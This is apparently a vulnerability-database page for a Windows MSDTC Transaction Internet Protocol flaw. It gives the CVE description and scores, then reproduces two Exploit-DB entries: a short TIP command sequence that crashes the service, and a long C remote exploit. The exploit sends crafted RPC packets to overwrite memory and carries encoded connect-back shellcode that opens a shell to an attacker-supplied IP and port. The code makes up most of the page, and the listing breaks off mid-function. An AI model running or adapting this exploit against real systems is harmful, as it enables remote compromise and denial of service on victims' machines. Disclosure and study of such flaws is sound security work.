Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Distributed Transaction Controller in Microsoft Windows allows remote servers to cause a denial of service (MSDTC service exception and exit) via an "unexpected protocol command during the reconnection request," which is not properly handled by the Transaction Internet Protocol (TIP) functionality.
CVE Informations
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 5 | AV:N/AC:L/Au:N/C:N/I:N/A:P | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 26341
Publication date : 2005-10-10 22h00 +00:00
Author : anonymous
EDB Verified : Yes
source: https://www.securityfocus.com/bid/15058/info
The Microsoft Windows MSDTC (Microsoft Distribution Transaction Coordinator) service is prone to a denial of service vulnerability.
The vulnerability exists in the TIP (Transaction Internet Protocol) functionality that is provided by MSDTC. This vulnerability may be exploited by a remote attacker to deny the availability of services that depend on MSDTC.
This issue only exists on operating systems that have support for the TIP protocol enabled. This vulnerability is remotely exploitable on default configurations on Windows 2000. TIP is not enabled by default on Windows XP and Windows Server 2003 even if the MSDTC service is running.
Update: Microsoft reports several systems have experienced one or more problems after installing the critical update from Microsoft Security Bulletin MS05-051 for this issue. For a more detailed explanation of these problems please see the attached microsoft knowledge base article 909444.
IDENTIFY 3 3 DST_IP:DST_PORT/ANYID -
PUSH SOMESTRING
PREPARE
RECONNECT
Exploit Database EDB-ID : 1352
Publication date : 2005-11-30 23h00 +00:00
Author : Swan
EDB Verified : Yes
/*
Hard to exploit, isn't it? I have tested it on 10+ box, most of them allocated 0x9X0058 for
me, however, I cannot write the pointer to 0x7ffdf020 since the length I can control should be
divided exactly by 8 (merde), so I choose 0x684191c4.
This following program is mostly like a D.O.S. 10+ blackbox were tested, only 5 were owned,
and I think the successful rate should be much lower in real circumstance.
I mark it as a POC and wish someone (no hat) could supply us a much better exploit. It is
said that this fault could be steered clear of and another segfault is consequently triggered,
so...
Any mails are welcome but spam, I need NO viagra. Je suis celibataire.
Greetz:
All SST guys, I love your bald heads that never hatted.
Shuo Yang, I love you.
OYXin, ...
Code by:
Swan (Swan[at]0x557[dot]org)
*/
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")
char peer0_0[72] = {
(char)0x05, (char)0x00, (char)0x0b, (char)0x03, (char)0x10, (char)0x00, (char)0x00, (char)0x00,
(char)0x48, (char)0x00, (char)0x00, (char)0x00, (char)0x01, (char)0x00, (char)0x00, (char)0x00,
(char)0xd0, (char)0x16, (char)0xd0, (char)0x16, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x01, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x01, (char)0x00,
(char)0xe0, (char)0x0c, (char)0x6b, (char)0x90, (char)0x0b, (char)0xc7, (char)0x67, (char)0x10,
(char)0xb3, (char)0x17, (char)0x00, (char)0xdd, (char)0x01, (char)0x06, (char)0x62, (char)0xda,
(char)0x01, (char)0x00, (char)0x00, (char)0x00, (char)0x04, (char)0x5d, (char)0x88, (char)0x8a,
(char)0xeb, (char)0x1c, (char)0xc9, (char)0x11, (char)0x9f, (char)0xe8, (char)0x08, (char)0x00,
(char)0x2b, (char)0x10, (char)0x48, (char)0x60, (char)0x02, (char)0x00, (char)0x00, (char)0x00 };
char peer0_1[1024] = {
(char)0x05, (char)0x00, (char)0x00, (char)0x83, (char)0x10, (char)0x00, (char)0x00, (char)0x00,
(char)0x2c, (char)0x05, (char)0x00, (char)0x00, (char)0x01, (char)0x00, (char)0x00, (char)0x00,
(char)0x04, (char)0x05, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x07, (char)0x00,
(char)0xe0, (char)0x0c, (char)0x6b, (char)0x90, (char)0x0b, (char)0xc7, (char)0x67, (char)0x10,
(char)0xb3, (char)0x17, (char)0x00, (char)0xdd, (char)0x01, (char)0x06, (char)0x62, (char)0xda,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x06, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x06, (char)0x00, (char)0x00, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00,
(char)0x31, (char)0x00, (char)0x00, (char)0x00, (char)0x07, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x07, (char)0x00, (char)0x00, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x2b, (char)0x02, (char)0x33, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x2b, (char)0x02, (char)0x00, (char)0x00, (char)0xcc, (char)0xCC, (char)0xcc, (char)0xcc,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00 };
char peer0_2[300] = {
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xfd, (char)0xfd, (char)0xfd, (char)0xfd, (char)0xdd, (char)0xdd, (char)0xdd, (char)0xdd,
(char)0xdd, (char)0xdd, (char)0xdd, (char)0xdd, (char)0x24, (char)0x00, (char)0x8f, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x08, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x08, (char)0x00, (char)0x00, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x00, (char)0x00,
(char)0x09, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x09, (char)0x00, (char)0x00, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00 };
#define ip_offset (213+22)
#define port_offset (208+22)
unsigned char realsc[] =
"\xEB\x0F\x5B\x33\xC9\x66\xb9\xaa\x04\x80\x33\x99\x43\xE2\xFA\xEB"
"\x05\xE8\xEC\xFF\xFF\xFF"
"\x70\x6D\x99\x99\x99\xC3\x21\x95\x69\x64\xE6\x12\x99\x12\xE9\x85"
"\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12\xEF\xE1\x9A\x6A"
"\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6\x9A"
"\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D\xDC"
"\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A\x58"
"\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12"
"\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71"
"\xE9\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3"
"\x9B\xC0\x71\xC4\x99\x99\x99\x1A\x75\xDD\x12\x6D\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66\xCE\x61\x12"
"\x41\x10\xC7\xA1\x10\xC7\xA5\x10\xC7\xD9\xFF\x5E\xDF\xB5\x98\x98"
"\x14\xDE\x89\xC9\xCF\xAA\x59\xC9\xC9\xC9\xF3\x98\xC9\xC9\x14\xCE"
"\xA5\x5E\x9B\xFA\xF4\xFD\x99\xCB\xC9\x66\xCE\x75\x5E\x9E\x9B\x99"
"\x9E\x24\x5E\xDE\x9D\xE6\x99\x99\x98\xF3\x89\xCE\xCA\x66\xCE\x65"
"\xC9\x66\xCE\x69\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66"
"\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A\x71\x9E\x66\x66\x66\xDE\xFC"
"\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC"
"\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED"
"\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB"
"\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA"
"\xF6\xFA\xF2\xFC\xED\xD8\x99\xFA\xF6\xF7\xF7\xFC\xFA\xED\x99";
struct ostype
{
DWORD TopSEH;
char description[255];
};
ostype OS[] = {
{0x684191c4, "Write NdrserverCall2 pointer From 0x990058"},
{0x684191c4, "Write NdrserverCall2 pointer From 0x980058"},
{0, NULL}
};
DWORD BaseImage[]={0x990058, 0x980058};
void MakeShell(char *ip, int port)
{
//make shellcode
unsigned short tp = htons(port)^(u_short)0x9999;
unsigned long ti = inet_addr(ip)^0x99999999;
memcpy(&realsc[port_offset], &tp, 2);
memcpy(&realsc[ip_offset], &ti, 4);
}
SOCKET ConnectTo(char *ip, int port)
{
WSADATA wsaData;
SOCKET s;
struct hostent *he;
struct sockaddr_in host;
int nTimeout = 5000;
if(WSAStartup(0x0101,&wsaData) != 0)
{
printf("error starting winsock..");
exit(-1);
}
if((he = gethostbyname(ip)) == 0)
{
printf("Failed resolving '%s'", ip);
exit(-1);
}
host.sin_port = htons(port);
host.sin_family = AF_INET;
host.sin_addr = *((struct in_addr *)he->h_addr);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("Failed creating socket");
exit(-1);
}
if ((connect(s, (struct sockaddr *) &host, sizeof(host))) == -1)
{
printf("Failed connecting to host\r\n");
exit(-1);
}
setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, (char*)&nTimeout,sizeof(nTimeout));
return s;
}
void Disconnect(SOCKET s)
{
closesocket(s);
WSACleanup();
}
void WriteFakeLength(DWORD fakelen) //should > 0x22b
{
*(DWORD*)(peer0_1+15*8) = fakelen/2;
}
void BuildShell(char *ip, int port)
{
MakeShell(ip, port);
memcpy(peer0_1 + 132, realsc, sizeof(realsc));
}
void BuildContext(char*ip, int port)
{
SOCKET s = ConnectTo(ip, port);
//SOCKET s = ConnectTo("202.119.9.191", 2288);
send(s, peer0_0, sizeof(peer0_0), 0);
char buf[5000];
WriteFakeLength(1200);
recv(s, buf, sizeof(buf), 0);
send(s, peer0_1, sizeof(peer0_1), 0);
send(s, peer0_2, sizeof(peer0_2), 0);
memset(buf, 0, sizeof(buf));
recv(s, buf, sizeof(buf), 0);
Disconnect(s);
if(buf[8] != 0x5c)
{
printf("Target not support! Quiting....");
exit(0);
}
Sleep(500);
}
void help(char *n)
{
printf("-=[ SST ]=------------------------------------\n");
printf(" MSDTC Arbitrary Opposite Memory Write Flaw\n");
printf("----------------------------------------------\n");
printf("Usage:\n");
printf(" %s [Taget IP] [Target Port] [Your IP] [Your Port] <type>\n\ntype:\n", n);
int i=0;
while(OS[i].TopSEH)
{
printf(" %d %s\n", i, OS[i].description);
i++;
}
}
void main(int argc, char *argv[])
{
if(argc < 5)
{
help(argv[0]);
return;
}
int itype = 0;
int b = 0;
if(argc == 5)
b = atoi(argv[5]);
char *ip = argv[1];
int port = atoi(argv[2]);
printf("(^_^) Start exploiting journey!\n");
//build context, copy shellcode to heap
BuildContext(ip, port);
BuildContext(ip, port);
BuildContext(ip, port);
BuildShell(argv[3], atoi(argv[4]));
BuildContext(ip, port);
BuildContext(ip, port);
BuildContext(ip, port);
//finish building
printf("(^_^) Context built!\n");
SOCKET s = ConnectTo(ip, port);
send(s, peer0_0, sizeof(peer0_0), 0);
char buf[5000];
WriteFakeLength(OS[itype].TopSEH-BaseImage[b]-4);
recv(s, buf, sizeof(buf), 0);
send(s, peer0_1, sizeof(peer0_1), 0);
send(s, peer0_2, sizeof(peer0_2), 0);
Disconnect(s);
